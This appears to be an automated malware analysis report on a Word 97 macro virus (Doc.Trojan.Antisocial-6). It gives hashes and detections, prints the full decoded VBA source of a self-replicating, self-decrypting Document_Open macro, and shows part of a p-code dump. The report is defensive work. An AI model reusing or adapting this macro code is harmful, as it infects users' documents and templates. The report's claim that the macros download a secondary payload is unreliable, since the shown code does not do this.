Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e569b4ccb925985…

MALICIOUS

Office (OLE)

Size: 50.0 KB
Created: 1999-06-14 18:58:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 886e278b8797c5b960912dc6b3ba07ab
SHA-1: c9843c22ef8e7aac00fd890f70b145503e0086ed
SHA-256: 3e569b4ccb925985b18796ca706c173f2ebd0e64e117df0e9e2b014d5a97a49a
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, which is a common technique for malicious documents. The macros are obfuscated and appear to be designed to download and execute a secondary payload. The ClamAV detection further confirms the malicious nature of the file.

Heuristics (3)

  • ClamAV: Doc.Trojan.Antisocial-6 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Antisocial-6
  • VBA macros detected (severity: medium; 1 related finding; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7857 bytes
SHA-256: 574c1d92765deb25fd135aad0b39b412770126a02c11e5fe7a25f5ec0b427d1f
Detection: ClamAV: Doc.Trojan.Antisocial-6
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): Application.EnableCancelKey = wdCancelDisabled
If MacroContainer.FullName = ActiveDocument.FullName Then GoTo ADD Else GoTo NDD
NDD: For d = 11 To NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
F = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - F: C$ = C$ & Chr(B$): Next X: A = C$
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End
ADD: For d = 11 To ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: C$ = ""
I = (ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(d, 1))
F = (Mid(I, 2, 1)): For X = 3 To Len(I): B$ = Asc(Mid(I, X, 1)) - F: C$ = C$ & Chr(B$): Next X: A = C$
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.ReplaceLine d, A: Next d: End Sub
'6Vxo|gzk&Y{h&Jui{sktzeIruyk./@&Ut&Kxxux&Xky{sk&Tk~z@&IussgtjHgxy.(Zuury(/4Iutzxury.(Sgixu(/4Jkrkzk
'5Tuyntsx3Xf{jStwrfqUwtruy%B%5?%Tuyntsx3HtsknwrHts{jwxntsx%B%5?%Tuyntsx3[nwzxUwtyjhynts%B%5
'5Nk%If~-St|.%B%6%Ymjs%X~xyjr3Uwn{fyjUwtknqjXywnsl-'H?aFzytwzs3nsk'1%'Fzytwzs'1%'Tujs'.%B%'Ijqywjj%4^%H?a'
'3Iru#g#@#44#Wr#PdfurFrqwdlqhu1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1FrxqwRiOlqhv=#F'#@#%%
'3L#@#+PdfurFrqwdlqhu1YESurmhfw1YEFrpsrqhqwv1Lwhp+4,1FrghPrgxoh1Olqhv+g/#4,,
'7M'D'Pu{/Yuk'1'?0'2'8A'Mvy'_'D'8'[v'Slu/P0A'I+'D'Hzj/Tpk/P3'_3'800'2'MA'J+'D'J+'-'Joy/I+0A'Ul {'_A'H'D'J+
'1NbdspDpoubjofs/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/SfqmbdfMjof!e-!#(#!'!G!'!B;!Ofyu!e
'7Vwlu')JAcIl{yh€5pup)'Mvy'V|{w|{'Hz'*8A'Wypu{'*83'ThjyvJvu{hpuly5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Spulz/83'ThjyvJvu{hpuly5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Jv|u{VmSpulz0A'Jsvzl'*8
'7Uvyths[ltwsh{l5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Klsl{lSpulz'83'Uvyths[ltwsh{l5]IWyvqlj{5]IJvtwvulu{z5P{lt/805JvklTvk|sl5Jv|u{VmSpulz
'6Gizo|kJui{sktz4\HVxupkiz4\HIusvutktzy4Ozks.7/4IujkSuj{rk4JkrkzkRotky&72&Gizo|kJui{sktz4\HVxupkiz4\HIusvutktzy4Ozks.7/4IujkSuj{rk4Iu{tzUlRotky
'1OpsnbmUfnqmbuf/WCQspkfdu/WCDpnqpofout/Jufn)2*/DpefNpevmf/BeeGspnGjmf!)#D;]Cfusbz/joj#*
'4EgxmziHsgyqirx2ZFTvsnigx2ZFGsqtsrirxw2Mxiq,5-2GshiQshypi2EhhJvsqJmpi$,&G>`Fixve}2mrm&-
'7Hj{p}lKvj|tlu{5Zh}lHz'MpslUhtlADHj{p}lKvj|tlu{5M|ssUhtlA'Luk'Z|i
'7.Il{yh€…I€…S€z…Rv}pjR…Olssv…]_lyz…Huk…H]lyz

' Processing file: /opt/analyzer/scan_staging/ca847bd633a84f9b9039da85245a5c4a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 18446 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' 	BoS 0x0000 
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #1:
' 	Ld MacroContainer 
' 	MemLd FullName 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo ADD 
' 	Else 
' 	BoSImplicit 
' 	GoTo NDD 
' 	EndIf 
' Line #2:
' 	Label NDD 
' 	StartForVariable 
' 	Ld d 
' 	EndForVariable 
' 	LitDI2 0x000B 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St C$ 
' Line #3:
' 	Ld d 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	Paren 
' 	St I 
' Line #4:
' 	Ld I 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Paren 
' 	St False 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Ld X 
' 	EndForVariable 
' 	LitDI2 0x0003 
' 	Ld I 
' 	FnLen 
' 	For 
' 	BoS 0x0000 
' 	Ld I 
' 	Ld X 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Asc 0x0001 
' 	Ld False 
' 	Sub 
' 	St B$ 
' 	BoS 0x0000 
' 	Ld C$ 
' 	Ld B$ 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St C$ 
' 	BoS 0x0000 
'
... (truncated)